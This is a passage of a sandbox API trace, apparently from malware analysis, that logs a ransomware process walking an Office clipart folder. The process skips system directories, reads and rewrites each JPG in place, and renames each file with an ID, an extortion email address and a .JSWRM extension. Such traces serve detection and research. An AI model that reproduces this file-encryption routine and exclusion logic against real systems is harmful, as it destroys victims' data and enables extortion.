lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0091.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0091.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0091.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0091.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0091.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.086] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387604.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387604.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387604.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387604.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0091.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0091.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0091.087] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5380be, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5380be, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5380be, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x98ec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0387882.JPG", cAlternateFileName="")) returned 1 [0091.087] lstrcmpiW (lpString1="J0387882.JPG", lpString2=".") returned 1 [0091.087] lstrcmpiW (lpString1="J0387882.JPG", lpString2="..") returned 1 [0091.087] lstrcmpiW (lpString1="J0387882.JPG", lpString2="...") returned 1 [0091.087] lstrcmpiW (lpString1="J0387882.JPG", lpString2="windows") returned -1 [0091.087] lstrcmpiW (lpString1="J0387882.JPG", lpString2="recovery") returned -1 [0091.087] lstrcmpiW (lpString1="J0387882.JPG", lpString2="perflogs") returned -1 [0091.087] lstrcmpiW (lpString1="J0387882.JPG", lpString2="documents and settings") returned 1 [0091.087] lstrcmpiW (lpString1="J0387882.JPG", lpString2="$RECYCLE.BIN") returned 1 [0091.087] lstrcmpiW (lpString1="J0387882.JPG", lpString2="system volume information") returned -1 [0091.087] lstrcmpiW (lpString1="J0387882.JPG", lpString2="msocache") returned -1 [0091.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0091.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387882.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387882.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0387882.JPG", lpUsedDefaultChar=0x0) returned 12 [0091.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0091.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0091.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387882.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387882.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0387882.JPG", lpUsedDefaultChar=0x0) returned 12 [0091.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0091.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0091.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0091.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0091.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387882.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387882.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.088] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=39148) returned 1 [0091.089] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x98e0) returned 0x24d210 [0091.089] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x98e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x98e0, lpOverlapped=0x0) returned 1 [0091.094] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.094] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x98e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x98e0, lpOverlapped=0x0) returned 1 [0091.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.095] CloseHandle (hObject=0x314) returned 1 [0091.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0091.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0091.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0091.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0091.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0091.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0091.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.096] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387882.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387882.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387882.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387882.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0091.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0091.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0091.100] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5380be, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5380be, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5380be, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7df3, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0387895.JPG", cAlternateFileName="")) returned 1 [0091.100] lstrcmpiW (lpString1="J0387895.JPG", lpString2=".") returned 1 [0091.100] lstrcmpiW (lpString1="J0387895.JPG", lpString2="..") returned 1 [0091.100] lstrcmpiW (lpString1="J0387895.JPG", lpString2="...") returned 1 [0091.100] lstrcmpiW (lpString1="J0387895.JPG", lpString2="windows") returned -1 [0091.100] lstrcmpiW (lpString1="J0387895.JPG", lpString2="recovery") returned -1 [0091.100] lstrcmpiW (lpString1="J0387895.JPG", lpString2="perflogs") returned -1 [0091.100] lstrcmpiW (lpString1="J0387895.JPG", lpString2="documents and settings") returned 1 [0091.100] lstrcmpiW (lpString1="J0387895.JPG", lpString2="$RECYCLE.BIN") returned 1 [0091.100] lstrcmpiW (lpString1="J0387895.JPG", lpString2="system volume information") returned -1 [0091.100] lstrcmpiW (lpString1="J0387895.JPG", lpString2="msocache") returned -1 [0091.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0091.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387895.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387895.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0387895.JPG", lpUsedDefaultChar=0x0) returned 12 [0091.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0091.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0091.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387895.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387895.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0387895.JPG", lpUsedDefaultChar=0x0) returned 12 [0091.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0091.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0091.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0091.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0091.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387895.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.102] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32243) returned 1 [0091.102] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7df0) returned 0x24d210 [0091.102] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7df0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7df0, lpOverlapped=0x0) returned 1 [0091.106] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.106] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7df0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7df0, lpOverlapped=0x0) returned 1 [0091.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.107] CloseHandle (hObject=0x314) returned 1 [0091.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0091.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0091.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0091.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0091.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0091.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0091.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.107] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387895.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387895.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387895.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0091.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0091.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0091.108] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5380be, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5380be, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5380be, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x351c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0390072.JPG", cAlternateFileName="")) returned 1 [0091.108] lstrcmpiW (lpString1="J0390072.JPG", lpString2=".") returned 1 [0091.108] lstrcmpiW (lpString1="J0390072.JPG", lpString2="..") returned 1 [0091.108] lstrcmpiW (lpString1="J0390072.JPG", lpString2="...") returned 1 [0091.108] lstrcmpiW (lpString1="J0390072.JPG", lpString2="windows") returned -1 [0091.109] lstrcmpiW (lpString1="J0390072.JPG", lpString2="recovery") returned -1 [0091.109] lstrcmpiW (lpString1="J0390072.JPG", lpString2="perflogs") returned -1 [0091.109] lstrcmpiW (lpString1="J0390072.JPG", lpString2="documents and settings") returned 1 [0091.109] lstrcmpiW (lpString1="J0390072.JPG", lpString2="$RECYCLE.BIN") returned 1 [0091.109] lstrcmpiW (lpString1="J0390072.JPG", lpString2="system volume information") returned -1 [0091.109] lstrcmpiW (lpString1="J0390072.JPG", lpString2="msocache") returned -1 [0091.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0091.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0390072.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0390072.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0390072.JPG", lpUsedDefaultChar=0x0) returned 12 [0091.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0091.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0091.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0390072.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0390072.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0390072.JPG", lpUsedDefaultChar=0x0) returned 12 [0091.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0091.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0091.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0091.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0091.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0390072.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0390072.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.109] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13596) returned 1 [0091.109] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3510) returned 0x24d210 [0091.110] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3510, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3510, lpOverlapped=0x0) returned 1 [0091.117] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.117] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3510, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3510, lpOverlapped=0x0) returned 1 [0091.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.117] CloseHandle (hObject=0x314) returned 1 [0091.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0091.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0091.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0091.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0091.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0091.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0091.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.117] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0390072.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0390072.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0390072.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0390072.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0091.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0091.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0091.118] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5380be, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5380be, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5380be, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31883, 